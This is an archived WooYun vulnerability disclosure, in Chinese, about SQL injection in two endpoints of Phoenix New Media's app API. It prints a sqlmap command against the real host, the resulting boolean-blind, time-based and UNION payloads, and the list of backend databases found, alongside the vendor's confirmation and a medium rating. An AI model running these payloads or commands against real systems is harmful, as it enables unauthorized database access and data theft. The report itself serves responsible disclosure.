乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-08: 细节已通知厂商并且等待厂商处理中 2016-04-11: 厂商已经确认,细节仅向厂商公开 2016-04-21: 细节向核心白帽子及相关领域专家公开 2016-05-01: 细节向普通白帽子公开 2016-05-11: 细节向实习白帽子公开 2016-05-26: 细节向公众公开
。。。
注入点一 http://appapi.yc.ifeng.com/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1*注入参数 pos注入点二 http://appapi.yc.ifeng.com/web/qy_comments.php?a=shuping_index&articleid=1注入参数 articleid
sqlmap -u "http://appapi.yc.ifeng.com/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1*" --dbms=mysql --random-agent --dbs
16个数据库数据真多。。
sqlmap identified the following injection point(s) with a total of 37 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://appapi.yc.ifeng.com:80/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1 AND 7276=7276 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://appapi.yc.ifeng.com:80/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aJyQ) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: http://appapi.yc.ifeng.com:80/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626b71,0x4855425a6f4d6174574b416878684448534e446d53534f4e4164474c62446d436447554572436c4a,0x7162767a71),NULL,NULL,NULL,NULL-- ----back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://appapi.yc.ifeng.com:80/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1 AND 7276=7276 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://appapi.yc.ifeng.com:80/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aJyQ) Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: http://appapi.yc.ifeng.com:80/web/store.php?a=announcement&token=8e7bab8d33&ct=iOS&pos=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a626b71,0x4855425a6f4d6174574b416878684448534e446d53534f4e4164474c62446d436447554572436c4a,0x7162767a71),NULL,NULL,NULL,NULL-- ----back-end DBMS: MySQL >= 5.0.0available databases [16]:[*] author[*] coreseek[*] cr_debug[*] information_schema[*] kettle[*] mobile[*] mysql[*] newuc[*] novel[*] pay[*] performance_schema[*] support[*] test[*] ucenter[*] uch[*] viewscount
intval
危害等级:中
漏洞Rank:8
确认时间:2016-04-11 15:21
非常感谢您对凤凰网信息安全的帮助。
暂无